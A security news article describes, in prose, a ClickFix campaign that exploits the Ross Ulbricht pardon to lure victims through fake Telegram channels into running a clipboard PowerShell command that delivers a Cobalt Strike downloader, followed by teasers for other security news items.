
This attack was first spotted by VX-underground specialists; this is a new variant of the ClickFix (ClearFake or OneDrive Pastejacking) attack vector. Various ClickFix modifications are pretty common nowadays. Typically, victims are tricked into visiting fraudulent websites and running malicious PowerShell commands, thus, manually infecting their systems with malware. For instance, malefactors require users to pass a fake CAPTCHA test or a verification procedure – allegedly, to solve display problems or join the channel.
Currently, the attackers are exploiting the recent news that US President Donald Trump has pardoned Ross Ulbricht, founder of the darknet marketplace Silk Road shut down in 2013.
Scammers use fake X (formerly Twitter) accounts to impersonate the Free Ross movement and direct users to supposedly official Ulbricht Telegram channels.

After clicking on such a link, victims are prompted to pass a verification test called Safeguard Captcha.

This Telegram app automatically copies a PowerShell command to the victim’s clipboard, and the user is prompted to open the Windows Run dialog and execute it to pass authentication.

According to Bleeping Computer, the code from the clipboard downloads and executes a PowerShell script that, in turn, downloads a ZIP archive from the openline[.]cyou website. This archive contains multiple files, including identity-helper.exe, which, according to VirusTotal, is nothing else but the Cobalt Strike downloader.
Security experts remind that under no circumstances should you run commands copied from the Internet in the Windows Run dialog box or in the PowerShell terminal (especially if you have no idea of what’s going on); while any obfuscation should ring the alarm bell.

2025.01.28 — J-magic backdoor attacked Juniper Networks devices using 'magic packets'
A massive backdoor attack targeting Juniper routers often used as VPN gateways has been uncovered. The devices were attacked by the J-magic malware that…
Full article →
2025.01.25 — 18,000 script kiddies have been infected with backdoor via XWorm RAT builder
According to CloudSEK analysts, malefactors attack novice hackers using a fake malware builder. Script kiddies' systems become infected with a backdoor that steals data and subsequently…
Full article →
2025.02.21 — Microsoft fixes vulnerability in Power Pages exploited by cybercriminals
Microsoft patched a severe privilege escalation vulnerability in Power Pages used by hackers as a 0-day. The vulnerability tracked as CVE-2025-24989 (CVSS score 8.2) pertains…
Full article →
2025.04.07 — Critical RCE vulnerability discovered in Apache Parquet
All versions of Apache Parquet up to and including 1.15.0 are affected by a critical remote code execution (RCE) vulnerability whose CVSS score is 10 out…
Full article →
2025.04.30 — Coinbase fixes 2FA bug that made customers panic
Cryptocurrency exchange Coinbase has fixed a bug in its Account Activity logs that caused customers to think their credentials were compromised. Earlier this month, BleepingComputer…
Full article →
2025.02.01 — Critical RCE vulnerability fixed in Cacti
A critical vulnerability has been discovered in the open-source Cacti framework: it enables an authenticated attacker to remotely execute arbitrary code. Vulnerability's ID is CVE-2025-22604; its…
Full article →
2025.01.24 — Hundreds of websites impersonating Reddit and WeTransfer spread Lumma Stealer
Sekoia researcher crep1x discovered that hackers are currently using some 1,000 pages impersonating Reddit and WeTransfer. Victims visiting these sites are tricked into…
Full article →
2025.04.01 — Hackers abuse MU plugins to inject malicious payloads to WordPress
According to Sucuri, hackers store malicious code in the MU-plugins (Must-Use Plugins) directory in WordPress and execute it while remaining undetected. The technique was first discovered…
Full article →
2025.02.06 — Let's Encrypt to stop sending expiration notification emails
The nonprofit organization announced that, starting June 4, 2025, it will stop sending expiration notification emails to subscribers. The primary reason behind this decision…
Full article →
2025.03.18 — Black Basta ransomware group developed its own automated brute-forcing framework
According to EclecticIQ, Black Basta Ransomware-as-a-Service (RaaS) group has developed its own automated brute-forcing framework dubbed BRUTED. It's used to hack edge network devices…
Full article →